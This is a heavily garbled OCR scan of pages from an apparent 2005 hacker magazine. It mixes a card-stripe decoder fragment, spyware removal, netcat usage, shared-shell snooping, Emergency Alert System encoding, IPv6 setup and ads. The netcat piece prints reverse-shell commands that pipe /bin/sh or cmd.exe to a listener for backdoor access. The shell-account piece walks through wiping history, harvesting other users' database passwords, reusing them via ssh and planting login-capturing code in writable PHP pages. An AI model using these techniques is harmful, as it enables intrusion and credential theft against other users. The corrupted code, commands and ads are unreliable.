auto-thres = atoi(optarg);
break;
case 'd': I + device .I
filename = xstrdup(optsrg);
break;
case 'f': I * file ./
filename = nstzdup(optarg);
uae-sndfile = 1;
break;
case 'h': / * help * /
print-help(stdout, argv(0l);
exit(Ex1T~succEss);
break;
case 'm': I' max-level f /
maxlevel = 1;
break;
case ' 6 ' : I' silent * I
verbose = 0;
break;
case 't': I * threshold +I
auto-thres = 0;
silence-three = atoi(optarg);
break;
case ' v ' : I* version * I
print-version(stdout);
exit(EX1T-SUCCESS);
break;
default: I* default +I
print-help(stderr, argv[Oll;
exit(EXIT_FAILURE);
break;
1
)

if (verbose) 1 I * print version +I

print_version(stderr);
fprintf(stderr, ''\"''I;
I
if (use-sndfile && ma%-level) ( I* sanity check * I
fprintflstderr, "*+' Error: -f and -m switches do not mixl\n");
exit(EX1T-FAILURE);
)

~f (filename == NULL) I * set default if no device is specified *I

filename = xstrdup(DN1CE);

if (verbose) I* open device for reading * I

fprintf(stderr, ' ' W * Opening Es\n", filename);
fd = open(fi1ename. 0-RDONLY);
if (fd == -1) {
perroc( "open() " 1 ;
exlt(EX1T-FAILURE);
1
~f (use-sndfile) I* open endfile or set device parameters ' I
sndGle = sndGle_init(fd, verbose);
else
sample-rate = dsp-initlfd, verbose);

if (max-level) ( I. show user maximum dsp level +I

print-max-level(fd, sample-rate);
exit(EXIT_SUCCESS);
1
if (!silence_thres) ( I * silence-thres sanity check + I
fprintf(stderr, "*" Error: Invalid silence threshold\n");
exit(EXIT_FAILURE);
I
if (use-sndfile) f t read sample ' 1
get_sndfile(sndfile);
else
9etLdsPlfd5 sample-rate, silence-thres);

if (auto-thees) I * automatically set threshold ./

silence-thres = auto-thres evaluate_max() I 100;

if (verbose) I +print silence threshold * I

fprintf(stderr, " * * + Silence threshold: %d (%d%$ of max)\n",
silence-thres, auto-tnres);

decode-aiken>iphase(FREQ-THRES, silence-thres); I * decode aiken biphase +I

close(fd1; I ^ close file * I

I * free memory ' I

\ s p r i n g looii Page 49 1
 by LoungeTab
LoungeTab@hotrnail.com
This is an article i n response t o "Scumware,
Spyware, Adware, Sneakware" i n 21:2. First I
would like t o commend shinohara on writing a
great article about the nastiest of nasties. One
thing I noticed was where he said MSCONFIG was
available i n allversions o f Microsoft since 98. Ac-
tually, MSCONFIG isn't included with any installa-
tion options of Win 2k, but any version o f
MSCONFIG will work under Win 2k. Irecommend
the XP version which i s available at http://down-
loads.thetechguide.corn/msconfig.zip. Ithought
I would also add my own process for eradicating
a l l types of scumware.
Are y o u Infected?
First, how do you know i f you are infected
with scumware? I f any o f the following sound
familiar:
A gangload o f popups, even when not con-
nected t o the Internet,
Internet Explorer toolbars (95 percent are
scumware),
Homepage Hijacking (inability t o change
homepage),
Internet activity from modem when no Inter-
net applications are running,
Numerous processes running that have seem-
ingly random names,
A process that has "XxX" or "teen" in its name
(quit looking a t so much porn),
Serious decay in system speed,
then more than likely you are infected with
scumware. What t o do next? Let's get rid of it. All
of it.
Removal
The following instructions are for users of a l l
versions of Windows. First you have t o download,
install, and update these programs. It is ex-
tremely important for you t o manually update
these programs because some of them do not
have the latest definitions when you download
them.
CWShredder http://www.majorgeeks.com/down
wload4086. html
Spybot S&D http://www.safer-networking.org/
w en/download/index. html
Adaware SE http://www.majorgeeks.co~n/down
~load506.html
SpySweeper http://www. webroot.com/wb/down
-loads/index,php
HijackThis http//www.spychecker.com/program
,/hijackthis. html
Now go ahead and restart your computer into
Safe Mode (hit F8 before the Windows splash
screen comes up). After your computer has
booted i n t o safe mode you will want t o first run
CWShredder. After launching, select "Fix" and it
will search for and remove any CoolWebSearch
programs. CoolWebSearch likes t o change many
Internet Explorer settings, adding their own web-
sites t o trusted sites, changing your search pref-
erences and homepages, and redirecting you t o
their sites whenever you mistype a URL. CW-
Shredder should take less than a minute to run.
Next on the list i s Spybot S&D. Run this nifty
little program and it will scan the registry and
files for occurrences of scumware. Select "Search
and Destroy" from the menu on the left and then
scan on the screen it brings up. This program will
take about 5-10 minutes t o run.
After that is done, run Adaware SE. For this
program select smart system scan. This program
also searches through the registry and folders for
scumware programs. This scan can take anywhere
from 10 minutes t o 2 hours.
The final file searching program, SpySweeper,
i s one of the best programs available i n my opin-
ion and it would be worth it t o purchase the f u l l
version. This program does an in-depth scan o f
a l l files, folders, and registry entries and re-
moves from them a l l the leftovers that the previ-
ous programs didn't catch. From the main menu
select "Sweep Now" and then "Start." After the
scan is complete you will be prompted for which
files you want t o be quarantined. This scan i s
similar t o Adaware and can take anywhere from
20 minutes t o 4 hours.
Finally, run HijackThis a t the menu select
Scan and it will display a complete list of BHOs,
Internet Explorer Toolbars, Startup items, and
extra buttons added t o Internet Explorer. Be sure
you understand what each entry i s before you
remove it! You may want t o keep many of these
entries.
/ your computer. Be sure t o read t h e documental
Kazaa
Did you ever have Kazaa installed on your
computer? I f so, go t o http://www.spychecker
-.com/program/kazaagone.html and download
KazaaBegone t o eliminate a l l traces of Kazaa
along with the bundled software that came with
it.
I n t e r n e t Explorer
Sick of Internet Explorer? Can't figure out how
t o completely remove it from your system? Down-
load IEeradicator from http://www.litepc.com/
-ieradicator.html t o completely remove it from
by DJ Williams
The following article is a continuation t o Mo-
biusRenoire1s original submission i n 21:2 "Fun
With Netcat." Netcat (nc), created by Hobbit, is
known as the "Swiss army knife" of security/hack-
ing tools. This is most likely due t o the tool's ex-
tensive features and capabilities. Before we
explore some additional uses o f netcat, you are
advised t o get written permission before execut-
ing any o f these examples on systems you do not
own. Sure, you may be saying "screw that" yet
even on work systems, employees have been fired
for running tools without permission.
As described i n the 21:2 article, netcat used
with basic options nc [host] [port] allows
TCP/UDP (-u) connections on a selected port t o
perform a variety o f tasks. The focus of this arti-
cle i s t o explore additional uses, so let's take a
look a t some more examples.
Web Server (banner) Discovery
Most web servers are configured by default t o
reveal the type and version, which may be helpful
t o an attacker. Wait ... Iknow some o f you are
saying Ichanged my banners t o obfuscate the
web server (i.e., RemoveServerHeader feature i n
the URLScan security t o o l t o mask IIS web
servers). The point here i s that someone could
have changed the banner and you may want t o
validate the output with an alternate t o o l such as
net-square's HllPrint (www.net-square.com/
*httprint/). With that said, let's look how web
server discovery can be accomplished. First we
need t o establish a connection t o the target web
server on the default H l l P port.
nc -vv target 80
, The -w option indicates that netcat i s run-
\Spring 2005
tion because it won't work with Win XP or Win 2k
sr2.
Summary
Your computer should now r u n much faster
since you freed up a l o t o f processing power from
processes that were absolutely worthless. At this
point Iusually remove a l l t h e applications except
Spysweeper and always let it r u n i n t h e back-
ground t o notify you of any changes t h a t are
made t o your Internet Explorer f i l e s and startup
files.
ning i n very verbose mode, followed by t h e tar-
get, which can be a domain or IP, a n d t h e default
web server port (80). Once netcat connects, you
must type i n an H l l P directive such as:
HEAD / HTTP/I. o
<en terz
<en t e n
The reply should indicate w h a t type o f web
server i s running. You can substitute t h e HEAD di-
rective for the OPTIONS directive t o Learn more
about the web server. An example o f t h e output is
listed below.
nc -w 10.10.10.1 80
www.example.com [10.10.10.1] 80 (http)
-open
HEAD / HTTP/I.O
.
HTTP/l 1 302 Found
Date: Sun, 22 Aug 2004 18:09:21 GMT
Server: Stronghold/2.4.2 Apache/l.3.6
*CZNetEU/2412 (Unix) mod-fastcgi/2.2. 12
Location: http://www.example.com/index.
Connection: close
Content-Type: text/html; charset=iso-
-8859-1
Port Scanning
As a fast alternative t o Fydor's nrnap (www.in
-secure.org/nmap/), the king o f p o r t scanners,
netcat can be used. I s this t h e best choice? Iam
sure it is not, yet the purpose o f t h i s article is t o
demonstrate netcat's abilities. Let's take a look
a t t h e syntax t o use netcat as a p o r t scanner.
nc -v -r -w3 -2 target portl-portn
The -v option indicates t h a t netcat i s running
P a g e 5x 1
 verbose mode, the -r is t o randomly select mised system. Two examples are listed below. \
ports from provided list, the -w i s the wait time i n Target Machine
seconds, and the -z option prevents sending data ,C -e path-to-program [host] [port]
t o the TCP connection. The target can be a do- The -e i s the program t o execute once a con-
main or I P and the port list follows (use a space nection i s established.
t o separate). An example of a TCP port scan (on a ~ h , following isa *nix sty{e:
'nix sewer) is listed below. Note: for UDP add the nc -, /bin/sh 0. 69 2112
-u option and associated ports. The following i s a Windows style:
nc -v -2 -r -w3 10.96.0.242 20-21 23 80-
nc.exe -e cmd.exe 10.10.10.69 2112
b445 /sort -k 3b
Attack Machine
www.example.com [10.96.0.242] 21 open
nc -vv -1 -p port
www.example.com [10.96.0.242] 23 open
The -w option indicates t h a t netcat i s run-
www.example.com [10.96.0.242] 80 open
www.example.com [10.96.0.2421 443 open
ning i n very verbose mode; -1 listen mode for in-
FTP coming connections; -p port number.
Yes, you read it right, netcat can be used as a Start a listener, pick a port allowed through
crude FTP tool. First you will need netcat in- t h e firewall:
stalled on both machines. I tested both a binary nc -vv -1 -P 2112
and text transfer. They both worked fine. Note: listenins on [any1 2112 - ..
for best results, make sure the sender has a small connect to [10.10.l0.691 from www.exam
delay (-w); the receiver does not require a delay. bple.com [lo.10.10.691 548
Go ahead and t r y it out! An example of the out- M ~ C I - O S OWindows
~~ 2000 [Version 5.00.21951
put i s listed below. (c) Copyright 1985-2000 Microsoft corp.
Sender
nc -w3 host port c file C:\inetpub\scriptsz
The -w wait time i n seconds; host/IP of re-
ceiver; < redirect file i n Note, you may need t o h i t enter a few times ...
nc -w3 127.0.0.1 2112 < help.txt and bang, you have a shell prompt on the remote
nc -w3 127.0.0.1 2112 < Sample.jpy system.
Receiver Final Words
nc -1 -p port > file
I n closing, we have seen the power of the net-
The -llisten mode for incoming connections; - cat tool. You are encouraged t o test i t s abilities
p port number; > rediredto file
nc -1 -p 2112 > help.txt
on your local system (127.0.0.1) as it will work.
nc -1 -p 2112 7 Sample.jpg For more information, check out the following
Shovel the Shell links:
To wrap up, I have included the most interest- htt~://www.zoran.net/~m-resourc~s/ne~
ing use of netcat, i n my humble opinion. Here we 'cat-hobbit-as~ (used as a reference)
will be using netcat t o shovel the shell (command htt~://www.securityfocus.com/tools/137
prompt) from one machine t o another. This has ,(download site)
been used and most likely is i n use right now, Shout Outs: REL, DM, JM, KW, SW, and PF (the
where one can acquire a backdoor into a compro- band).

The VCDs f r o m

a r e now available
They consist of all of the talks which took place i n the two main tracks of the conference,
which occurred i n July 2004. There are 78 discs i n total! We can't possibly fit all of the
titles here but we can tell you that you can get them for $5 each or $200 for the lot. Much
more info can be found on our website (www.2600.com) where you can also download all
of the audio from the conference. I f you want to buy any of the VCDs, you can send a
check or money order to 2600, PO Box 752, Middle Island, NY 11953 USA or buy them
credit card a t store.2600.com.
2600 Magazine 1
 by st4r-runner
Having a shell account on a shared system is
convenient, fun, and dangerous. A l o t of web-
hosting services provide shell access and some
ISPs offer shell accounts on their Linux/Unix
boxes. I f you're Lucky enough t o have one you
should be aware of the potential for information
leakage and protect yourself on these systems.
Let's demonstrate how t o harvest some info.
First, prepare your environment t o avoid leaving
a telltale trail:
rm -/.bash-history
then
In -s /dev/null -/.bash-history
I f it's not a bash shell then do the same for
the .sh-history or whatever t h e case may be.
Now let's see what we have for user directories:
Is -a1 /home
You'll probably get permission denied. No
problem:
cat /etc/passwd
should show you a l l the user directories any-
way. What's i n their directories? Hopefully
Is -a1 /home/username
won't work (but you never know). So where
can you go from there? See if perhaps their .bash
files are readable.
Is -1 /home/username/.bash-history
Is -1 /home/username/.bashgrofile
Is -1 /home/username/.bashrc
Are any o f those readable (rw-r--r--)? Take a
look at them. They may show some interesting in-
formation. Now here's where it can get interest-
ing. Most shell servers will have a web server
available for sharing out a personal web page.
This directory w i l l likely be "/PublicHtml (you
should have the same directory). But if you want
t o be sure then
grep UserDir httpd.conf
httpd.conf can be located i n different places
depending on the installation. Some common Lo-
cations are /etc/httpd, /etc/apache, /usr/
-local/apache/conf, or/var/www/conf or do.
ps ax / grep httpd
and it might show you t h e f u l l command line
(/usr/sbin/httpd -f /etc/httpd/httpd.conf). Once
you know the UserDir, guess what? That directory
is world readable. Big deal, right? Well take the
,
time t o poke a little further. Users are notorious
for storing sensitive information i n those directo-
ries. They think t h a t j u s t because t h e y don't pro-
vide a link for t h a t file or directory on their little
web page means that no can get t o it. Users will
put things like "bank-info.xls" o r "pic-of-wife-no-
one-should-see.jpgM or "myfavband.mp3". What
else could we do? Let's see. Ah, t h e user i s run-
ning PHP-Nuke or some other php/mysql based
portal and they have a nice config-php file.
1s -1 /home/usernme/www/*.php
You'd be surprised a t how many users make
their database password the same as their login
password t o t h a t system.
vi /home/username/www/contig.php
...
Hmm dbuname=username a n d dbpass=my-
secretpw. OK. So now Iown their database. But I
wonder if they would be dumb enough t o have
that same password for this system.
ssh -1 username localhost
Just do it from localhost, not y o u r home sys-
tem (if the user or sysadmin runs t h e "last" com-
mand it will reveal your I P address). I f t h e login
i s unsuccessful, don't worry. There may be more
t o look a t still.
How about writable files and directories?
find /home/username/www -perm 0777 -print
find /home/username/www -perm 0666 -print
Play around with permission modes. 6 or 7 i n
the last position i s what you're looking for. I f a
user has a writable directory t h e n you can put
your own files i n there. I f a user has a writable
file like a php then you can put your own spyware
i n t o the code t o let you know when users access
the page or if it has a login form y o u can write
code i n there t o write the user name and pass-
word t o a file for you t o collect later on. What-
ever.
Now be careful o f what you do. You are not al-
lowed t o violate someone's privacy or destroy
their content. Some linux administrators have
gotten smart and used grsecurity's patches t o log
a l l exec's from users so they can be alerted if
some user i s running "find / -perm 0777". You
w i l l get caught. So make sure t h a t y o u stay under
t h e radar. Find out if t h e system i s a grsecurity
kernel.
uname -a
Well, have fun poking around b u t don't do
anything stupid.
/
* Inside the
Emeroency
la Alert System
by Tokachu
The Emergency Alert System, commonly called
EAS, originates from the FCC-mandated Emer-
gency Broadcast System (formerly known as
Conelrad), which was nothing more than a Long
multifrequency tone generator and detector. Be-
fore the Kennedy Administration, such signals
were only accessible for major networks and by
the early 1990s the system was showing i t s age.
Some cable companies resorted t o building their
own unique alert systems using old phone equip-
ment because the 30 year old system was, quite
literally, falling apart. I n 1994, after three years
of research and development, the FCC introduced
what is now the modern EAS, and i n 1997 the
system was made mandatory.
Network topology
The original EBS worked i n a daisy-chain fash-
ion, where the authorities would notify one radio
station, that radio station would notify another
station, and so forth. The EAS works i n a hierar-
chical manner, where the notifying party (civil
authorities, the National Weather Service, or Law
enforcement) notify the largest station i n the
area. From there, other smaller radio stations ac-
tually have a receiver hooked up t o the EAS en-
coder/decoder (the "endec") that listens for the
big radio station, and the endec will cut i n t o the
radio station's signal t o transmit at least three
bursts of data along with the attention signal.
Data Format
I'll be brief i n the data format: it's FSK-en-
coded (one tone is a mark, or "1" i n binary, and
another tone i s a space, or "OM), which limits i t s
transmission speed t o about 1200 bps. However,
it operates at a very strange baud: 520.83 bps, or
one b i t every 1.92 milliseconds. The space fre-
quency is the bitrate multiplied by three (exactly
1562.5 Hz),,and the mark frequency is the bitrate
multiplied by four (approximately 2083.3 Hz).
Each byte is a regular eight b i t byte containing
ASCII data (the most significant byte is ignored
when receiving the data format), so it's very easy
t o modulate data.
The header consists o f 16 bytes with binary
value "10101011". As the bitrate and transmis-
sion protocols are constant, there i s no need
t o transmit bitrate calibration signals or
,
mark/space information. Here i s a sample
transmission, preserved i n eight b i t format:
->*<**,*..*.?.,-
ZCZC-WXR-HUW-03 71 83i0300
b-0661830-WXYZ/FM -
The sixteen funny symbols a t t h e beginning i s
the 16 byte header, along with another four byte
header of "ZCZC" t o indicate ASCII data. "WXR" i s
the notifying party (the National Weather Ser-
vice, for this example). "HUW" i s t h e message
code ("Hurricane Warning"), and "037183" i s the
affected area, noted i n undashed FIPS 6-4 for-
mat. The first digit i s the region, which i s usually
set t o "Nationwide" (0) and ignored; t h e second
and third digits note the state (North Carolina),
and the last three digits are t h e county number
(Wake County). To store more t h a n one Location,
the format might look like "######-
######+", with each "######-" being a six
digit location code and with t h e l a s t code ending
with a plus rather than a minus symbol. The four
digits after the plus symbol represent t h e length
of time the alert i s effective for (exactly three
hours i n this example). For the n e x t seven digits,
the first three are a Julian-formatted date ("066"
means the 66th day of t h e year, o r May 7th i n
2005). The last four digits are t h e starting time
(6:30 pm). The next eight characters hold t h e call
sign o f the radio station sending o u t t h e alert. It
i s space-padded at the end, and any dashes i n
t h e call sign are replaced with slashes. The mes-
sage ends with a single dash.
What i s n o t shown here i s t h e two-tone signal
o f 853 Hz and 960 Hz, which must be emitted for
a t least eight seconds after t h e data i s sent at
,least
, * , ,,three
<
times. From there, data with
,,,,,,,,,,,
NNNN" transmitted exactly
three times acts as the signal for t h e end of the
transmission. For some really detailed informa-
tion, you should read document FCC 47 CFR 11,
available on (http://fcc.gov).
Security
I'm sure you're thinking something along the
lines o f "if there's nothing t o authenticate or en-
crypt the information, what's keeping people
from breaking i n t o machines a n d sending fake
signals?" Well, there's a few t h i n g s you should
know. First, most radio stations have a live per-
son t o confirm whether or n o t t o forward any
message received. Second, these machines are
not hooked up like computers; they're placed
h o n g i d e transmission equipment, and are not
hooked up t o any network or external computer
(with the exception of video crawls i n television
stations, but those still require manual interven-
tion t o function). Ican t e l l you that every time I
hear that little "duck quack," Ido flip out, but
even though Ihave a Legal obligation t o forward
the message, Ican call the radio station after-
wards t o confirm it (and if it's fake, Ican break
back into the radio circuit t o let people know).
But let's say you happen t o get i n t o the radio
station and get physical access t o the machine
(which you won't) or happen t o somehow break
into the remote transmission facilities t o inter-
rupt the audio and use your own EAS endec
(which you probably won't). The FCC can find you
easily because you'd have t o be very close or in-
side the radio station t o pull such a task off. You
would then be prosecuted and your message
might not even be forwarded! The only vulnera-
1 bility Ican find is the f a d that the FCC mandates
1 that there be either a weekly or monthly test of
I the EAS endec. Unfortunately, that means that a
rogue attacker could very likely be able t o inject a
test signal into a cable television network, which
would not only interrupt one station, but every
I P - V , L Redux
by Gr@ve-Rose
Hello everyone. Since my last article touched
upon an introduction t o the IPv6 protocol, I
thought a nice follow-up article on how t o con-
figure your network would be beneficial and
some fun practice. Without further adieu, let's
get down t o business.
My Network
As a point of reference, here is a (very) basic
overview of my network at home. Frankenserver i s
my Linux gateway, server, and basic a l l-in-one
'
box running Red Hat EL3 and Checkpoint FW-1
NGFP4 R55 connected t o a 3Mb PPPoE connec-
tion. My main desktop PC i s Alice and she runs
Mandrake 10.0 (2.6.3-7mdk vanilla). I have
about five or six more computers but will only be
focusing on Frank and Alice.
Tunnel Broker
I'm assuming that your current ISP does not
offer native IPv6 connections. I f it does, you can
station i n that area. This kind o f message would
not result i n another "War of the Worlds" sce-
'I
nario, but would still result i n loss o f revenue by
the television stations. Then again, a test only ,
lasts a few minutes and unless the attacker struck
during the Super Bowl commercial break, the
losses would be negligible. I'll keep the door
locked, just i n case you get any ideas.
Conclusion
While it is very easy t o make a signal genera-
tor for the EAS, there i s no real use for it beyond
t h e transmitter. I f you're daring, you could mod-
ify a radio packet program t o use the frequencies
and bitrate of the EAS t o automatically log emer-
gencies. Radio Shack used t o sell a radio scanner
t h a t could tune i n t o FM stations and TV audio
carriers and decode EAS signals for about 870
some time ago, although it might be a b i t more
expensive nowadays.
Nonetheless, until the EAS i s completely inte-
grated into consumer appliances such as cellular
phones, there is nothing t o worry about when it
comes t o "breaking into" the system, and with
the FCC collecting comments on the next genera-
tion o f the EAS, it w i l l probably be very stable
and very secure i n the days t o come.
probably stop reading here! For the rest of us, we
need t o establish an IPv6 tunnel with a tunnel
broker. Tunnel broker's are organizations that will
allocate you a network from their subnet that you
can use. Some of the ones out there include Hur-
ricane Electric (http://ipv6tb.he.net) and
Hexago (http://www.hexago.com) as well as
many others. I have used both o f the aforemen-
tioned but will focus on Hexago as I have had
good service with them.
Swing over t o the Hexago site and, at the top
right of the page, select the "Get IPv6 i n 3 steps"
link. Go through the short registration process
and get t h e Linux TSP client a t t h e end. Save the
TSP client on your border router (Frank for me)
and uncompress it. Install it with the command:
"make target=linux installdir=/usr/local/tspc i n
,stall" which will install the program i n /usr/
,local/tspc.
' Once you have installed t h e TSP client, switch
to /usr/local/tspc/bin and edit t h e tspc.conf file.
Here are the main things you will need t o have:
tsp-dir=/usr/local/tspc Location of the program
auth-method=any Choose the best for us
client-vd=auto Interface to peer with (external)
userid= - Username
passwd= - Password
template=linux - Using Linux, right?
server=broker.freenet6.net -Used for logging in
retry_delay=30 - 30 second retries
tunnel_mode=v6anyv4 - Leave this as it is
if-tunnel-v6vd=sitl - Leave this as it is
if-tunnel_v6udpv4=tun - Leave this as it is
proxy-client=no -
We are not a proxy server
keepalive=yes - Always a good idea
keepalive-interval=30 - 30 second keepalive
host-type=router - We are a router
prefixlen=48 - Obtain a 148 subnet
if-prefix=ethO - Internal network card
Once you have configured this, save the file
and run the command: "./tspc -f ./tspc.conf -wv"
and you should see the transaction take place.
Any error messages you see if it fails are most
likely i n the Hexago FAQ pages. Check there for
more help. Run an "ifconfig -a" and you should
now see your sit1 interface with a 1128 subnet
(our tunneling mechanism) and ethO should now
have a global-unicast I P address starting with
2001: with a /48 subnet.
Client Configuration
Head on over t o your desktop PC (Alice, i n my
case) and, if you're running a kernel pre-2.6, run
"insmod ipv6" t o install the IPv6 module. Wait for
a few moments and then run an "ifconfig -a" and
your ethernet adapter should now have its own
global-unicast (2001:) I P address. How did this
happen? Well, the TSP client also works as
radv(d) which will advertise I P addresses for con-
figuration. Cool, eh?
Now, let's add DNS resolution. Technically,
any DNS server can give you an A6 record (dig -t
AAAA servername.com) but we want t o make sure
of this. Open /etc/resolv.conf and add the follow-
ing t o the top:
options inet6
nameserver ,2001:238: r l
Yes, that is a valid IPv6 nameserver (at the
time of this writing). Once this i s done, we should
move on t o the security portion ....
Security Considerations
This is where things get tricky. I'm running
Checkpoint Firewall-1 and, although it does sup-
port IPv6, not a l l features are available yet. As
such, Ihave had t o make some modifications t o
both Alice and Frank.
First off, Ihad t o allow the Hexago IPv4
server t o access Frank's IPv4 unrestricted t o allow
for different ports which may b e used i n the
\
6over4 tunnel. Because o f this, I performed a se-
curity audit on Frank t o ensure t h a t t h e only ser-
vices Listening are t h e ones I want t o have
running. (This i s good practice anyway.) Right
now, only HTTP(S) and SSH are Listening on IPv6.
Second, although Checkpoint does support
IPv6, it currently struggles with s t a t e f u l inspec-
tion o f tunneled traffic for IPv4 and IPv6. This
means t h a t anyone can access any o f t h e global-
unicast I P addresses I've been assigned. I n lay-
man's terms, Alice's IPv6 i s unprotected. A quick
"netstat -na I grep \:\:" revealed only SSH lis
wtening on :::22. Hacking /etc/ssh/sshd-config
and changing the Listenports t o ::1 and
172.17.2.2, followed by a "service sshd restartH
worked properly. Now the only service on Alice
Listening on IPv6 i s SSH Listening on t h e loop-
back interface only.
Lastly, Icreated my IPv6 objects within t h e
SmartDashboard of Checkpoint ([6]-Alice-v6
--host-node, [6]-Frank-ethO-host-node, [6]-
Frank-sitl-host-node and [= 1 -]-Internal-
-v6-network) and allowed my Internal-v6-net
-work out without limitation.
Testing
If everything has gone correctly, you should
be able t o ping6 sites. Try "ping6 www.kame.net"
which should return from orange.kame.net. I f
DNS, doesn't work, their I P address is:
2001:200:0:8002:203:47ff:fea5:3085.
How about websites? The best o n e t o test with
i s http://www.ipv6.bieringer.de/ because you
can onlyaccess it from an IPv6-enabled machine.
IPv4 browsing w i l l return a Bad Gateway error
message.
What's really interesting t o see are t h e actual
packets going back and forth. Isuggest using
Ethereal but even tcpdump w i l l show you t h e IPv4
addresses followed by the (un)encapsulated IPv6
addresses. Fun stuff!
Conclusion
I hope t h a t this article has helped you on
your way t o learning more about I P v 6 as well as
how itfunctions. Ihave some documents floating
around on the web about IPv6 so if you can track
them down, they should help y o u out as well.
Take a look at different websites o u t there and,
bundled with t h e inquisitive nature I ' m sure you
possess, you'll be flying v6-style i n n o time!
Shouts: ChlxOr, phoneboy, B o b Hinden,
David Kessens, TAC-Kanata, elligirf, anyone I may
have missed, and o f course, eXoDuS (YNBAB-
WARL)!
Page 57'
I Happenings
SUMMERCON 2005 PRESENTS: TOOLS OFTHE TRADE. Come one, comeall!
Hackers, phreakers, phrackers, feds. 2600 shock troops, cops. "security profession-
als.' U4EA. rOOt kids club, orerr, arouoier. conference whores. kOd3rr. convicted
II 'eon%. concerneo parcnrr. an0 teachpi5. Iiackrrr an0 oeer col Ioe far tne lecnno-
cd fpre'nnt rne propnets narneo yo. aoodr. J.neL-6 n A-st n Tekar. Omnl
A L I ~ no'el Onrnrann. 100 San Jaolrro at Rtn i l r e ~ t Atown.
Pre-reaiiter now!
. TX 78701 For mare
~nformahan,t-shirts, registration, and much more: http://www.summercon.org
I CAROUNACON 2005. h n e 10-12 at the Ra eiqn AmeriS~irerhotel. A d m ~ ~ r i a n
SI5. Confc~mcerate for t h na.eI
welcome.
~ room5 aial aole at rara.lnacon arg. Speaxerr
WHAT THE HACK! Timer have changed: Terrorism, metal detectors, special new
laws, and our leaders getting ever closer to their dream of "knowing it all." It's
been a cram almost four vears since the last hme all the tribes of the hacker uni-
vFrlP cdmpeo 0-1 ~nTnp heIner anor at hA.2001. nlqn n ? e t o qe'togrlner, meet.
r e f ~ m 1ho6
. 0.r prolec$, nrlo alsc .r$ our loerr ho matt?, rherner )o. re into
figuring autwhat they're up to, doing something about it, or having a good time
with some of the smartest and funniest people we know of, come to What The
Hack, July 28-31, near Den Borch. The Netherlands. For more informahon, visit
http://whatthehack.org.
INTERZONE GOES WEST! While the Atlanta Interfine stays hacker can,
InterzoneWest will be a more professional style LT. conference, carrying on i n the
tradition of "effecting change through education." Along with InterzoneWest,
-
GRAYAREA the nan- traditional recuritv.academv -
.- w i l l be haooenino.
.. teachina
I methodologies and rkillr instead of test answers! San Frannsco Bay Area In early
October 2005. See inten0ne.com or grayarea.info for the latest detalls.
1 -
SPAMSHIRT.COM take same roam . and out, it on a t-shirt. Now available i n the
II US.! www.rpamshirt.com.
CHECK OUT JEAH.NETfor reliable and affordable Unix shells. Beginners and ad-
vanced urerr love JEAH's Unix shells for performancedriven uptimer and a huqe
list of Virtual Horts. Your account lets you store data, use IRC. SSH, and e m a i l k t h
camolete anvacv,and- recuntv. JEAH also offers fast and stable hortino for voui>
II
4~
web rlte, plus theability to register and manage your own domain name. All at
very"compehtive
' prices. Special for 2600 subscribers: Mention 2600and receive
setup fees waived. Look to www.jeah.net for the exceptional service and attention
I g E F d : h DOWNli'Mf ON DVD! Years i n the makina but we hone it was worth the
I
I
I
&a#- A co.0.r OvD IP~ t l a t lntIJOe5 the two no., oocdmsntary, an in-depth tnrer.
w e w m,n < e m Murlrr. an0 nra.0 :hree hour$ of extra scener. or1 faorage. and
ml,ceI nnml.5 st .ff P *.I capnonlng for 20 (1b111 nor-I. 20) lanq~aqes,<o.nnwn-
tar" track, and a lot of thinqs you'll iust have to find far vourrelf! The entire two
dis; set can be had bv * rendhd$30
. to Freedom O o w n t i m e " ~ ~PO
~ .Box 752. Middle
I Island NY 11953 IlSAar - buardetino
-, from our online stare at
http://store.2600.com. (VHS copier of the film rhllavailable for $15.)
NETWORKINGAND SECURIPI PRODUCTS available at OvationTerhnology.com.
1 We're a Network Securitv and Internet Privacy conrultinq firm and supplier of oet-
working hardware. Our online stare f e a t u r e r ~and ~ ~firewall hardware, wirelelr
hardware, cable and DSL modems/routers, IP access devices. VoIP products.
parental control products, and ethernet switches. We pride ourselver an prwiding
the highest level of technical expertise and customer ratisfactton. Our commitment
to you ... No surprises! Easy returns! Buy with confidence! After all, Security and
Privacyis our burinerr! Virit us at http://www.0vationTechnology.com/store.htm.
ONUNE SERVICES. Web hostina. , cheao . domains, areat dedicated sewers. SSL
II rertr, an0 a 51 r o r c Lnccx odr w*.hoQ4 com
HACKER LOGO T-SHIRTS AND STICKERS. lnorc ' ~ the r rnow' recognize Thp
G 8oer as tne new kacrer -090. T-qrlr.. anfl 5r#r*er$rm?lazoned m l h tne nac*e#
Logo can be found at HackerLogo.com. Our products are tap quality, and will visu-
all" associate vou as a member of the hacker culture. A oartion of the oroceedr oo
I ro ruppor tne E wfranlc Frontier Foundanon l l r l t ur a' ~vwwHacrerloqo con
PHRAlkE. I r e ret-nno og) 6 r r n n ~ the
t !#n#\eq.arrer *a-.C we to t r a m tne
I
2600 readers who have also become new rubrctibers and encourager those who
have not ACK their need for diverre computer information i n conjundon with that
of 2600 to ded~catesome oackets and become a ~ ~ b s c t i btodav! er V ~ l us
t at our
new domain www.pearlyfr~eprerr.com/phraine.
HACKER T-SHIRTS AND STICKERS at JinxGear.com. Stop running around naked!
We've got new rwagalinaus t-rh~rts, stickers. and miscellaneous contraband com-
ing out monthly including your classic hacker/geek designs, hat-short panties, dog
shirts. and a whole mess of kickarr stickers. We also have LAN oartv lirhnar.
n a c w con'errr~pI!5nngs. mellaqe~orbmr,a pnato cat er), an0 m0n.n y con-
.
terrr. he1 oonr ern biy. 125: r gn or tne ma) 8ng Irr an0 have a m a w e ra win
five t r ,If_ 01 101 OY. tne easy ~nlt.,rno-I 10 get a frer sucrer. Grr 11n l at
1
wwwJinx.cam!
PHONE HOME. Tiny, sub-miniature. 7/10 ounce, programmable/reprogrammable
touct-tone multi-freo~nl* , , .IDTMn, dialer which can store uo to I 5 touch-tme
o\qtrc .n#+ Ir ne o aqamr the teleonare rerelver s mlrwphone for olalmg Prerr
nOUE to a~toma!#cay dla rne :tore3 Oigit~ani+ can :"en ne hear0 :nro .qn
1 1 oltr,?
~ I I ~ I ~ I>p<,,>k~~
~ ~ I LItleal
~IC frm'i 1 < r t ~ ~ l d ,A~ l! z~ t, ~ c ~
doqr/rhlmpr. rignlflrant others. hackers. and computer wlisrds. blvp one to a
bay/g>rlfi~endor to that poten6al"iomeone"you meet at a party, the supermar-
~~ ~! # I~! , ,cIh\1
VIC ~
ket, school, or the mall: with your pre-programmed telephone number, he/rhe will
always be able to call you! Also, ideal i f you don't want to "disclose" your tele-
phone number but want someone to be able to call you locally or long distance by
